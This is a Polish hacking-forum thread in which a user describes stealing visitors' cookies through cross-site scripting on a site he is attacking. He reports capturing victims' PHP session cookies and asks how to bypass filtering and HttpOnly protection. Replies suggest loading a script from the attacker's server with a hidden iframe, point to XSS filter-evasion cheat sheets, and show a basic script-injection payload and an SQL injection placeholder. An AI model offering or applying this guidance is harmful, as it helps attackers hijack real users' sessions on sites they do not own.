Pokaż wyniki 1 do 7 z 7

Temat: wyciąganie cookie

  1. #1
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie wyciąganie cookie

    Za pomocą Dom w javascript wyciągam sobie ciasteczka, które zapisują się do pliku na moim serwerze. Jednak wiadomo, iż żaden internauta nie wprowadzi podejrzanego kodu do swojej przeglądarki. Zastanawiałem się jak automatycznie odpalić mój skrypt wraz z ładowaniem się strony, którą atakuje.
    Początkowo chciałem umieścić na stronie odnośnik do mojego serwera do pliku, który nie istnieje. Występował błąd 404. W htaccess ustawiłem, że jak wystąpi ten błąd to żeby otworzyło mój kod (javascript:.....) jednak kod się nie odpalał, tylko wyskakiwał komunikat o zmianie położenia strony.
    Później chciałem wykorzystać funkcje window.open. Stworzyłem stronę, która odpala drugą kartę z atakowaną stroną a po chwili w tej nowej karcie odpalał mój kod. W skrócie wygląda ona tak
    Kod html:
    <input type="button" value=1 onclick="window.open('http://podatnastrona.pl','Podglad','width=400;height=300')">
    <input type="button" value=2 onclick="window.open('javascript:alert(kod zapisujący cookie na moim serwie)','Podglad','width=400;height=300')">
    Co prawda tutaj kolejne strony otwierają się z odnośników, ale pisałem ten kod z pamięci i nie pamiętam jak on dokładnie wyglądał
    Jak nacisnę button z numerkiem dwa to wyskoczy komunikat. Natomiast jak najpierw nacisnę 1 włączy się strona i nacisnę 2 to nie uruchomi to mojego kodu javascript.
    1)Jak zrobić żeby ten kod javascript odpalił się po naciśnięciu najpierw 1 a potem 2?
    2)Istnieje jakiś sposób, żeby w odnośnik wsadzić kod javascript jeśli strona, ktorą atakuje dodaje do odnośników http:// na początku?
    3)Znacie jakiś skuteczny sposób na wyciągnięcie cookie (kod wyciągający mam, chodzi mi jedynie jak go umieścić na jakiejś stronie)?

  2. #2
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    jak mozesz gdzies dopisac js, to zrob poprostu <script src="twoj server">, a w pliku .js wrzuc iframea z visibility: hidden.

  3. #3
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie

    Jednak strona, na której próbuje przeprowadzić atak filtruje wszelką treść. Można jakoś dostawić kod javascript za pomoca javascript dom?

  4. #4
    Zarejestrowany
    Jan 2007
    Postów
    18

    Domyślnie

    hmm nie wiem =D zalezy jakie znaki filtruje =D wpisz sobie w google : xss cheat sheet i bedziesz mial obejscia filtrowania=D
    http://0x00000.110mb.com/school.jpg
    Kod:
    <script language=JavaScript>alert('0x00000')</script>
    Kod:
    .../article.php?id=[SQL]
    To są podstawy panowie

  5. #5
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie

    Dobra znalazłem lukę w zabezpieczeniach:P Mogę kraść teraz cookie Ale kradnąc je zaskoczył mnie fakt, iż jak włączyłem wtyczkę w ff do edycji cookie na stronie, którą hack'łem pokazało się kilkanaście cookie z tej strony a tylko kilka z nich( na szczęście z PHPsesion) zostało przesłanych od ofiar. Żeby to sprawdzić wpisałem w url javascript:alert(document.cookie) i rzeczywiście pokazały się tylko niektóre cookie wysłane z tej strony. Od czego to zależy czy dane ciacho wysłane do przeglądarki wyskoczy po żądaniu document.cookie czy też nie?
    Ostatnio edytowane przez ruben : 10-25-2008 - 15:11

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Od parametru 'domain' przypisanego do niektorych cookie. Zobacz w wikipedii na przyklad pod haslem 'HTTP Cookie' (anglojezycznej sie znaczy).
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Avatar ruben
    ruben jest offline The user's
    Zarejestrowany
    Jul 2008
    Postów
    57

    Domyślnie

    A może ma to związek z HttpOnly? Jak patrzę na domain w poszczególnych cookie wysłanych z tej strony to są one podobne. Niektóre tylko z przodu mają "." Może to od niej zależy? Skąd przeglądarka w ogóle wie kiedy wysłać chronione cookie a kiedy nie jak strona ich żąda? Można to jakoś ominąć?

Podobne wątki

  1. Odpowiedzi: 25
    Autor: 01-31-2012, 08:57
  2. Wyciąganie hasła (phpBB)
    By Zuzia in forum Hacking
    Odpowiedzi: 32
    Autor: 11-13-2009, 13:04
  3. Cookie
    By Ren-Ar in forum Newbie - dla początkujących!
    Odpowiedzi: 10
    Autor: 06-15-2008, 06:59
  4. Zawartosc cookie
    By messiah in forum Inne języki
    Odpowiedzi: 7
    Autor: 04-30-2008, 21:25
  5. Wlasne cookie - realne?
    By ~SD in forum HTML/DHTML/XHTML
    Odpowiedzi: 4
    Autor: 10-17-2007, 19:26

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj